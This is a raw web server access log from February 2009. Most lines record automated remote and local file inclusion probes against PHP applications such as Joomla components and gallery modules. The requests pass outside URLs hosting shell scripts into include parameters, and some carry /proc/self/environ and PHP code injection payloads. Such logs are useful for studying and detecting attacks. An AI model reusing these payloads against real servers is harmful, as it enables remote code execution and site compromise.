85.204.231.202 - - [04/Feb/2009:19:59:42 -0600] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
77.221.130.27 - - [04/Feb/2009:20:04:17 -0600] "GET /index.php?classified_path=/proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.221.130.27 - - [04/Feb/2009:20:04:17 -0600] "GET /logs/index.php?classified_path=/proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/4.61 (Macintosh; I; PPC)"
65.55.208.135 - - [04/Feb/2009:20:05:52 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [04/Feb/2009:20:05:52 -0600] "GET /costume/thmb6.htm HTTP/1.1" 200 3118 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
200.13.253.154 - - [04/Feb/2009:20:07:09 -0600] "GET /logs/access_log.1210291200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kazandoska.ru/id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
82.194.72.142 - - [04/Feb/2009:20:07:25 -0600] "GET /logs/access_log.1216512000/errors.php?error=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
82.194.72.142 - - [04/Feb/2009:20:07:25 -0600] "GET /errors.php?error=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
82.194.72.142 - - [04/Feb/2009:20:07:25 -0600] "GET /logs/errors.php?error=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
147.213.65.178 - - [04/Feb/2009:20:07:51 -0600] "GET /logs/access_log.1216944000/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
147.213.65.178 - - [04/Feb/2009:20:07:52 -0600] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
147.213.65.178 - - [04/Feb/2009:20:07:52 -0600] "GET /logs/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
218.249.153.130 - - [04/Feb/2009:20:11:37 -0600] "GET / HTTP/1.1" 200 1243 "-""Java/1.6.0_04"
147.213.65.178 - - [04/Feb/2009:20:11:44 -0600] "GET /logs/access_log.1218758400/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
200.13.253.154 - - [04/Feb/2009:20:13:50 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kazandoska.ru/idi.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
189.74.132.91 - - [04/Feb/2009:20:15:05 -0600] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://gugakedu.co.kr/kboard/image/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
147.213.65.178 - - [04/Feb/2009:20:15:57 -0600] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.158.167.98 - - [04/Feb/2009:20:16:11 -0600] "GET /logs/access_log.1199577600//send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 330 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.158.167.98 - - [04/Feb/2009:20:16:12 -0600] "GET //send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 303 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.158.167.98 - - [04/Feb/2009:20:16:24 -0600] "GET /logs/access_log.1199577600//send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:16:25 -0600] "GET //send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:16:25 -0600] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:16:29 -0600] "GET /logs/access_log.1206057600//send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 330 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.158.167.98 - - [04/Feb/2009:20:16:53 -0600] "GET /logs/access_log.1206057600//send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:16:59 -0600] "GET //send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:17:02 -0600] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:17:03 -0600] "GET //send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:17:04 -0600] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:17:04 -0600] "GET //send_reminders.php?noSet=0&includedir=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:21:39 -0600] "GET /logs/access_log.1215216000///playing.php/common/db.php?commonpath=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 338 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.158.167.98 - - [04/Feb/2009:20:21:39 -0600] "GET ///playing.php/common/db.php?commonpath=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:21:39 -0600] "GET ///playing.php/common/db.php?commonpath=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 311 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.158.167.98 - - [04/Feb/2009:20:21:58 -0600] "GET /logs///playing.php/common/db.php?commonpath=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:21:58 -0600] "GET ///playing.php/common/db.php?commonpath=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:22:18 -0600] "GET /logs/access_log.1215216000///playing.php/common/db.php?commonpath=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:22:18 -0600] "GET ///playing.php/common/db.php?commonpath=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:22:18 -0600] "GET /logs///playing.php/common/db.php?commonpath=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
222.236.44.32 - - [04/Feb/2009:20:23:42 -0600] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 343 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.236.44.32 - - [04/Feb/2009:20:23:43 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 316 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.231.47.130 - - [04/Feb/2009:20:23:47 -0600] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 343 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.231.47.130 - - [04/Feb/2009:20:23:48 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 316 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
91.186.27.166 - - [04/Feb/2009:20:24:18 -0600] "GET /logs/access_log.1213747200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.backpackingisrael.com/robot.gif? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
91.186.27.166 - - [04/Feb/2009:20:24:18 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.backpackingisrael.com/robot.gif? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
91.186.27.166 - - [04/Feb/2009:20:24:19 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.backpackingisrael.com/robot.gif? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:24:35 -0600] "GET /logs/access_log.1219795200///playing.php/common/db.php?commonpath=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 338 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
91.186.27.166 - - [04/Feb/2009:20:25:19 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.backpackingisrael.com/robot.gif? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:20:25:37 -0600] "GET /logs/access_log.1219795200///playing.php/common/db.php?commonpath=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
91.186.27.166 - - [04/Feb/2009:20:25:38 -0600] "GET /logs/access_log.1212278400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.backpackingisrael.com/robot.gif? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
222.236.44.32 - - [04/Feb/2009:20:26:39 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
222.231.47.130 - - [04/Feb/2009:20:26:40 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
88.191.95.106 - - [04/Feb/2009:20:27:46 -0600] "GET /logs/e404.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:20:27:46 -0600] "GET /e404.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:20:27:46 -0600] "GET /logs/access_log.1218758400/e404.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.30.78.236 - - [04/Feb/2009:20:32:47 -0600] "GET /logs/access_log.1198454400 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
88.191.95.106 - - [04/Feb/2009:20:35:30 -0600] "GET /logs/access_log.1218758400%20%20/e404.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.204.231.202 - - [04/Feb/2009:20:35:46 -0600] "GET /logs/access_log.1211932800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
88.191.95.106 - - [04/Feb/2009:20:36:09 -0600] "GET /logs/access_log.1219622400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.808"
88.191.95.106 - - [04/Feb/2009:20:36:09 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
88.191.95.106 - - [04/Feb/2009:20:36:10 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.808"
64.13.249.26 - - [04/Feb/2009:20:36:23 -0600] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://f-y-p.nl/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
64.13.249.26 - - [04/Feb/2009:20:36:24 -0600] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://f-y-p.nl/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.205.6.78 - - [04/Feb/2009:20:36:39 -0600] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.hotelsunflower.it/includes/js/rhs/list.txt?? HTTP/1.1" 404 328 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
210.205.6.78 - - [04/Feb/2009:20:36:40 -0600] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.hotelsunflower.it/includes/js/rhs/list.txt?? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
210.205.6.78 - - [04/Feb/2009:20:36:41 -0600] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.hotelsunflower.it/includes/js/rhs/list.txt?? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
210.205.6.78 - - [04/Feb/2009:20:36:41 -0600] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.hotelsunflower.it/includes/js/rhs/list.txt?? HTTP/1.1" 404 328 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
82.194.72.142 - - [04/Feb/2009:20:37:21 -0600] "GET //include/write.php?dir=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
82.194.72.142 - - [04/Feb/2009:20:37:21 -0600] "GET /logs/access_log.1217203200//include/write.php?dir=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
82.194.72.142 - - [04/Feb/2009:20:37:21 -0600] "GET /logs//include/write.php?dir=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
82.194.72.142 - - [04/Feb/2009:20:38:04 -0600] "GET /logs/access_log.1216684800//include/write.php?dir=http://www.henneferkanuteam.de/apboard/info.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
147.213.65.178 - - [04/Feb/2009:20:40:50 -0600] "GET //common/db.php?commonpath=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
147.213.65.178 - - [04/Feb/2009:20:40:50 -0600] "GET /logs//common/db.php?commonpath=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
147.213.65.178 - - [04/Feb/2009:20:40:50 -0600] "GET /logs/access_log.1215216000%20%20//common/db.php?commonpath=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
81.91.84.219 - - [04/Feb/2009:20:41:03 -0600] "GET /logs/access_log.1217203200/e404.php?DOCUMENT_ROOT=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
81.91.84.219 - - [04/Feb/2009:20:41:03 -0600] "GET /e404.php?DOCUMENT_ROOT=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
81.91.84.219 - - [04/Feb/2009:20:41:04 -0600] "GET /logs/e404.php?DOCUMENT_ROOT=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
81.91.84.219 - - [04/Feb/2009:20:41:23 -0600] "GET /logs/access_log.1218758400/e404.php?DOCUMENT_ROOT=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
88.191.95.106 - - [04/Feb/2009:20:41:37 -0600] "GET /logs/access_log.1217203200/e404.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:20:41:41 -0600] "GET /logs/access_log.1217289600/e404.php?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.3.139.15 - - [04/Feb/2009:20:42:41 -0600] "GET /logs/access_log.1225843200//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
72.3.139.15 - - [04/Feb/2009:20:42:41 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
72.3.139.15 - - [04/Feb/2009:20:42:41 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
72.3.139.15 - - [04/Feb/2009:20:46:34 -0600] "GET /logs/access_log.1225670400//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
201.231.106.33 - - [04/Feb/2009:20:49:44 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://mnbmnb.fileave.com/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
201.231.106.33 - - [04/Feb/2009:20:49:44 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://mnbmnb.fileave.com/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
201.231.106.33 - - [04/Feb/2009:20:49:44 -0600] "GET /logs/access_log.1217116800//s_loadenv.inc.php?DOCUMENT_ROOT=http://mnbmnb.fileave.com/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
201.231.106.33 - - [04/Feb/2009:20:50:35 -0600] "GET /logs/access_log.1218153600//s_loadenv.inc.php?DOCUMENT_ROOT=http://mnbmnb.fileave.com/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
209.126.131.239 - - [04/Feb/2009:20:50:38 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
209.126.131.239 - - [04/Feb/2009:20:50:38 -0600] "GET /logs/access_log.1225843200//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
209.126.131.239 - - [04/Feb/2009:20:50:38 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
209.126.131.239 - - [04/Feb/2009:20:52:02 -0600] "GET /logs/access_log.1225670400//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
77.221.130.3 - - [04/Feb/2009:20:53:36 -0600] "GET //?cmd&file=http://madrigaldelavera.es/joomla/mambots/editors/test.txt?? HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
77.221.130.3 - - [04/Feb/2009:20:53:39 -0600] "GET /logs//?cmd&file=http://madrigaldelavera.es/joomla/mambots/editors/test.txt?? HTTP/1.1" 200 117465 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
209.126.131.239 - - [04/Feb/2009:20:54:13 -0600] "GET /logs/access_log.1223251200//components/com_flyspray/startdown.php?file=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
209.126.131.239 - - [04/Feb/2009:20:54:13 -0600] "GET //components/com_flyspray/startdown.php?file=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
209.126.131.239 - - [04/Feb/2009:20:54:19 -0600] "GET /logs//components/com_flyspray/startdown.php?file=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:20:55:05 -0600] "GET /logs/access_log.1213660800//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:20:55:05 -0600] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:20:55:05 -0600] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:20:56:24 -0600] "GET /logs/access_log.1218758400/accounts/inc/include.php?language=0&lang_settings[0][1]=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:20:56:24 -0600] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:20:56:24 -0600] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:20:56:27 -0600] "GET /logs/access_log.1214179200//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.126.131.239 - - [04/Feb/2009:20:56:46 -0600] "GET /logs/access_log.1215216000//components/com_flyspray/startdown.php?file=http://www.backpackingisrael.com/robot.gif???? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
82.194.72.142 - - [04/Feb/2009:20:57:23 -0600] "GET /logs/access_log.1219622400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
82.194.72.142 - - [04/Feb/2009:20:57:23 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
82.194.72.142 - - [04/Feb/2009:20:57:24 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
212.158.167.98 - - [04/Feb/2009:21:01:11 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
192.134.106.1 - - [04/Feb/2009:21:04:20 -0600] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 330 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
192.134.106.1 - - [04/Feb/2009:21:04:20 -0600] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
212.158.167.98 - - [04/Feb/2009:21:05:28 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:21:05:28 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
212.158.167.98 - - [04/Feb/2009:21:05:28 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
71.113.37.251 - - [04/Feb/2009:21:05:50 -0600] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
71.113.37.251 - - [04/Feb/2009:21:05:50 -0600] "GET /logs/access_log.1213660800//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
